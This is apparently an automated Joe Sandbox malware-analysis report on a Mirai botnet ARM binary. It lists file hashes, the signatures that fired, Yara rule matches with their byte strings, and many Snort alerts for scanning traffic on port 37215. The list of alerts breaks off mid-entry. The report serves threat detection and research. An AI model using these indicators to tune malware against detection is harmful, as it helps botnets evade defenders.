Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
skt.arm6.elf

Overview

General Information

Sample name:skt.arm6.elf
Analysis ID:1448421
MD5:ac0f7748a92af874c9b39799e0f77ee2
SHA1:ac9833859db52e9233fc3dd3b2d1186ebbcc5bcb
SHA256:30c4c8942474ab21b1d5624f68e707919ce95b4b9035f522b85a336b83e523cd
Tags:elfmirai
Infos:

Detection

Mirai
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1448421
Start date and time:2024-05-28 09:55:07 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 52s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:skt.arm6.elf
Detection:MAL
Classification:mal88.troj.linELF@0/0@42/0
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/skt.arm6.elf
PID:5497
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
skt.arm6.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    skt.arm6.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      skt.arm6.elfLinux_Trojan_Mirai_0bce98a2unknownunknown
      • 0x11bd4:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
      skt.arm6.elfMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
      • 0x11b78:$x2: /dev/misc/watchdog
      • 0x11b68:$x3: /dev/watchdog
      • 0x11be0:$s5: HWCLVGAJ
      SourceRuleDescriptionAuthorStrings
      5497.1.00007fa430017000.00007fa43002a000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        5497.1.00007fa430017000.00007fa43002a000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
          5497.1.00007fa430017000.00007fa43002a000.r-x.sdmpLinux_Trojan_Mirai_0bce98a2unknownunknown
          • 0x11bd4:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
          5497.1.00007fa430017000.00007fa43002a000.r-x.sdmpMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
          • 0x11b78:$x2: /dev/misc/watchdog
          • 0x11b68:$x3: /dev/watchdog
          • 0x11be0:$s5: HWCLVGAJ
          Process Memory Space: skt.arm6.elf PID: 5497JoeSecurity_Mirai_6Yara detected MiraiJoe Security
            Timestamp:05/28/24-09:56:35.433295
            SID:2829579
            Source Port:50258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984861
            SID:2835222
            Source Port:46710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.340030
            SID:2829579
            Source Port:58572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.900864
            SID:2829579
            Source Port:59102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810187
            SID:2829579
            Source Port:37736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990187
            SID:2829579
            Source Port:33476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.825399
            SID:2835222
            Source Port:55368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506954
            SID:2835222
            Source Port:60876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.280323
            SID:2835222
            Source Port:39840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260855
            SID:2829579
            Source Port:37032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.158350
            SID:2829579
            Source Port:33006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887704
            SID:2829579
            Source Port:44694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746088
            SID:2829579
            Source Port:39182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541254
            SID:2835222
            Source Port:49814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.446998
            SID:2835222
            Source Port:38870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047464
            SID:2835222
            Source Port:35626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280285
            SID:2829579
            Source Port:55562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060212
            SID:2829579
            Source Port:42610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837897
            SID:2835222
            Source Port:50322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731205
            SID:2829579
            Source Port:38716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.386712
            SID:2835222
            Source Port:37240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.671350
            SID:2835222
            Source Port:39106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953277
            SID:2835222
            Source Port:40170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065615
            SID:2829579
            Source Port:43022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.349175
            SID:2829579
            Source Port:48488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962822
            SID:2835222
            Source Port:42456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047916
            SID:2829579
            Source Port:60758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754459
            SID:2829579
            Source Port:57746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.477452
            SID:2829579
            Source Port:51656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895443
            SID:2835222
            Source Port:37508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827669
            SID:2829579
            Source Port:42022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.382116
            SID:2835222
            Source Port:35078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469693
            SID:2829579
            Source Port:47492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.451462
            SID:2835222
            Source Port:59400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862984
            SID:2835222
            Source Port:40614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.294620
            SID:2829579
            Source Port:44902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883220
            SID:2835222
            Source Port:57066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780069
            SID:2835222
            Source Port:47002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.828060
            SID:2829579
            Source Port:40450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065982
            SID:2829579
            Source Port:57514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.182240
            SID:2829579
            Source Port:55520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.814323
            SID:2829579
            Source Port:45716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061086
            SID:2829579
            Source Port:42914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290909
            SID:2829579
            Source Port:51920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908890
            SID:2829579
            Source Port:44384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506960
            SID:2829579
            Source Port:46904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299191
            SID:2835222
            Source Port:50298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803794
            SID:2835222
            Source Port:36540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733310
            SID:2835222
            Source Port:44964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307425
            SID:2835222
            Source Port:57186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777878
            SID:2829579
            Source Port:41498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777473
            SID:2829579
            Source Port:51990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743015
            SID:2829579
            Source Port:37016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299926
            SID:2829579
            Source Port:37622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.556789
            SID:2829579
            Source Port:34656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776284
            SID:2835222
            Source Port:55106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834542
            SID:2835222
            Source Port:47394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966858
            SID:2835222
            Source Port:36098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863018
            SID:2829579
            Source Port:58650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849406
            SID:2829579
            Source Port:33032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.937254
            SID:2835222
            Source Port:41788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872670
            SID:2835222
            Source Port:53778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863023
            SID:2835222
            Source Port:37926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812090
            SID:2835222
            Source Port:44054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865508
            SID:2829579
            Source Port:35586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.038106
            SID:2835222
            Source Port:35630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.682167
            SID:2829579
            Source Port:51672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851230
            SID:2835222
            Source Port:50774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828916
            SID:2829579
            Source Port:51744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376831
            SID:2829579
            Source Port:36388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260413
            SID:2829579
            Source Port:60524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892653
            SID:2835222
            Source Port:47134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.886654
            SID:2829579
            Source Port:45876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318228
            SID:2829579
            Source Port:56122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047342
            SID:2829579
            Source Port:54392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911946
            SID:2835222
            Source Port:59046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.025196
            SID:2835222
            Source Port:59766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856255
            SID:2835222
            Source Port:39464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665122
            SID:2829579
            Source Port:52244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.823362
            SID:2835222
            Source Port:44816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.635167
            SID:2829579
            Source Port:51498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870421
            SID:2835222
            Source Port:32858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910566
            SID:2835222
            Source Port:52824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979401
            SID:2829579
            Source Port:53252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952630
            SID:2829579
            Source Port:41892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.819989
            SID:2829579
            Source Port:40458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280480
            SID:2835222
            Source Port:47308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.946311
            SID:2835222
            Source Port:37856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.540106
            SID:2835222
            Source Port:51524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870763
            SID:2829579
            Source Port:40504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.727279
            SID:2829579
            Source Port:40576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910794
            SID:2835222
            Source Port:53420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810978
            SID:2835222
            Source Port:36362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770773
            SID:2829579
            Source Port:53750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061277
            SID:2829579
            Source Port:55038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.375254
            SID:2835222
            Source Port:36724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321768
            SID:2835222
            Source Port:59134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533187
            SID:2835222
            Source Port:54878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.308253
            SID:2829579
            Source Port:33636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279568
            SID:2835222
            Source Port:56896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.741786
            SID:2829579
            Source Port:40076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715582
            SID:2835222
            Source Port:42766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.957340
            SID:2829579
            Source Port:37638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810533
            SID:2829579
            Source Port:45310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870746
            SID:2835222
            Source Port:51302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.646683
            SID:2829579
            Source Port:44546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968227
            SID:2829579
            Source Port:33798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559180
            SID:2829579
            Source Port:43022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922302
            SID:2829579
            Source Port:55878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777439
            SID:2835222
            Source Port:33224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928789
            SID:2835222
            Source Port:46740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507116
            SID:2829579
            Source Port:52006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.808354
            SID:2829579
            Source Port:44014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.153230
            SID:2829579
            Source Port:41900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086350
            SID:2829579
            Source Port:44174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748405
            SID:2835222
            Source Port:49516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.944968
            SID:2829579
            Source Port:37268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.958554
            SID:2835222
            Source Port:60382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434336
            SID:2829579
            Source Port:39130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045907
            SID:2829579
            Source Port:36016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876927
            SID:2835222
            Source Port:58978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.332408
            SID:2829579
            Source Port:48130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444953
            SID:2835222
            Source Port:57190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919587
            SID:2829579
            Source Port:45386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727441
            SID:2835222
            Source Port:43512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824524
            SID:2835222
            Source Port:38096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506486
            SID:2829579
            Source Port:42160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004975
            SID:2829579
            Source Port:58324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.921377
            SID:2829579
            Source Port:54664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352206
            SID:2829579
            Source Port:40330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.774489
            SID:2835222
            Source Port:42094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918217
            SID:2829579
            Source Port:47560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336867
            SID:2829579
            Source Port:41456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.473805
            SID:2829579
            Source Port:41626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.886619
            SID:2829579
            Source Port:57580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.860441
            SID:2835222
            Source Port:51486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918076
            SID:2835222
            Source Port:37514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251121
            SID:2829579
            Source Port:37112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038289
            SID:2835222
            Source Port:53410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.864204
            SID:2829579
            Source Port:58002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435832
            SID:2829579
            Source Port:35550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770902
            SID:2835222
            Source Port:52724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.097154
            SID:2835222
            Source Port:35666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.511428
            SID:2829579
            Source Port:45820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714962
            SID:2829579
            Source Port:57826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508088
            SID:2829579
            Source Port:60844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.699157
            SID:2829579
            Source Port:60814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.559829
            SID:2835222
            Source Port:60940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910812
            SID:2829579
            Source Port:58198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837475
            SID:2835222
            Source Port:33130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.556345
            SID:2835222
            Source Port:44632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605229
            SID:2835222
            Source Port:51822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263635
            SID:2829579
            Source Port:34802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810372
            SID:2835222
            Source Port:33004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811698
            SID:2835222
            Source Port:59254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777038
            SID:2829579
            Source Port:56890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038996
            SID:2829579
            Source Port:33562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778394
            SID:2829579
            Source Port:51036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879664
            SID:2829579
            Source Port:34304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851130
            SID:2829579
            Source Port:38382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776220
            SID:2835222
            Source Port:40178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775428
            SID:2829579
            Source Port:46988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998427
            SID:2835222
            Source Port:34298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068553
            SID:2829579
            Source Port:59050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639011
            SID:2835222
            Source Port:43022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842930
            SID:2829579
            Source Port:50936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.553269
            SID:2835222
            Source Port:46942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915194
            SID:2835222
            Source Port:48676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374920
            SID:2829579
            Source Port:34602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961132
            SID:2835222
            Source Port:47344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.546162
            SID:2829579
            Source Port:34704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611224
            SID:2829579
            Source Port:33374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.261924
            SID:2835222
            Source Port:50450
